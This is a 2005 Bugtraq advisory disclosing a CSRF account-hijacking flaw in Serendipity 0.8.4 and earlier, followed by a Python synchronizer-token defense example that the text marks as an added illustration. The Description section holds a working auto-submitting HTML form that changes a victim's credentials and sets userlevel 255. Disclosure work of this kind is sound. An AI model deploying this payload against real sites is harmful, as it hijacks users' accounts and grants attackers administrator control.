Serendipity: Account Hijacking / CSRF Vulnerability

enji_at_infosys.tuwien.ac.at
Date: 09/29/05

    Date: 29 Sep 2005 12:58:48 -0000
    To: bugtraq@securityfocus.com

    ===========================================================
    Serendipity: Account Hijacking / CSRF Vulnerability
    ===========================================================
    Technical University of Vienna Security Advisory
    TUVSA-0509-001, September 29, 2005
    ===========================================================

    Affected applications
    ----------------------

    Serendipity (www.s9y.org)

    Versions 0.8.4 and prior.

    Description
    ------------

    An attacker is able to change the username and password of a logged-in user
    (and can therefore hijack that user's account) by tricking the user into
    opening a page with the following contents:

        <form action="http://your-server/path-to-s9y/serendipity_admin.php?serendipity[adminModule]=personal&amp;serendipity[adminAction]=save" method="post">
            <input type="text" name="username" value="evilguy" />
            <input type="text" name="password" value="evilpass" />
            <input type="text" name="realname" value="John Doe" />
            <input type="text" name="userlevel" value="255"/>
            <input type="text" name="email" value="john@example.com" />
            <input type="text" name="lang" value="en"/>
            <input type="submit" name="SAVE" value="Save" />
        </form>

        <script type="text/javascript">
          document.forms[0].submit();
        </script>

    The fields "your-server" and "path-to-s9y" in the form's action attribute have to
    be adjusted accordingly.

    Similar attacks (known as "Cross-Site Request Forgery", or CSRF) can be
    launched to perform other requests in the victim's name.
    This problem is not limited to Serendipity; it affects a large number of
    comparable web applications available at this time.

    Solution
    ---------

    Version 0.8.5 of Serendipity is reported by the developers to fix
    the Account Hijacking vulnerability as well as the general CSRF problem itself.
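
    The standard defence against the forged request shown above is a
    synchronizer token: the server binds an unguessable secret to the session,
    embeds it in its own forms, and refuses state-changing requests that do not
    carry it back. The following Python simulation is an added example and is
    not Serendipity's code or the fix shipped in 0.8.5; the session layout, the
    handler name `handle_personal_save`, and the sample forms are constructed
    for illustration. It shows the advisory's form fields (sent without a token)
    being rejected, and the same change succeeding when it comes from the
    application's own settings page.

```python
"""Synchronizer-token check for a 'save personal settings' action.

Added example (assumed names, constructed data), not Serendipity's own code.
"""
import hmac
import secrets


def new_session(username="alice"):
    # Server-side session of a logged-in user (constructed sample).
    return {"user": {"username": username, "password": "old-secret"},
            "csrf_token": None}


def issue_csrf_token(session):
    # One unguessable token per session; never derived from anything the
    # attacker's page can read.
    if session["csrf_token"] is None:
        session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def render_settings_form(session):
    # The application's own settings page embeds the token as a hidden field.
    return {"csrf_token": issue_csrf_token(session)}


# Fields the personal-settings handler is willing to update.
ALLOWED_FIELDS = ("username", "password", "realname", "email", "lang")


def handle_personal_save(session, form):
    """Apply the change only if the form carries this session's token.

    Returns (status, message). A page on another site cannot read the
    victim's settings page, so it cannot learn the token and gets 403.
    """
    expected = session["csrf_token"]
    supplied = form.get("csrf_token", "")
    if expected is None or not isinstance(supplied, str):
        return 403, "missing or invalid CSRF token"
    # Constant-time comparison; encode so non-ASCII input cannot raise.
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "missing or invalid CSRF token"
    for name in ALLOWED_FIELDS:
        if name in form:
            session["user"][name] = form[name]
    return 200, "saved"


# The advisory's forged form, copied as constructed sample input (no token).
FORGED_FORM = {"username": "evilguy", "password": "evilpass",
               "realname": "John Doe", "userlevel": "255",
               "email": "john@example.com", "lang": "en", "SAVE": "Save"}


def demo():
    """Forged request rejected, legitimate request accepted; returns True."""
    session = new_session()
    render_settings_form(session)          # victim has used the settings page
    forged_status, _ = handle_personal_save(session, FORGED_FORM)
    legit = {"username": "alice", "password": "new-secret",
             **render_settings_form(session)}
    legit_status, _ = handle_personal_save(session, legit)
    return (forged_status == 403 and session["user"]["username"] == "alice"
            and legit_status == 200 and session["user"]["password"] == "new-secret")


if __name__ == "__main__":
    print("token check works:", demo())
```

    Note that the token must be unique per session and compared in constant
    time; a token that is global, predictable, or only checked for presence
    gives no protection.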

    Acknowledgements
    -----------------

    Thanks to Serendipity developer Garvin Hicking for his quick response and
    professional cooperation.

    Nenad Jovanovic
    Secure Systems Lab
    Technical University of Vienna
    www.seclab.tuwien.ac.at

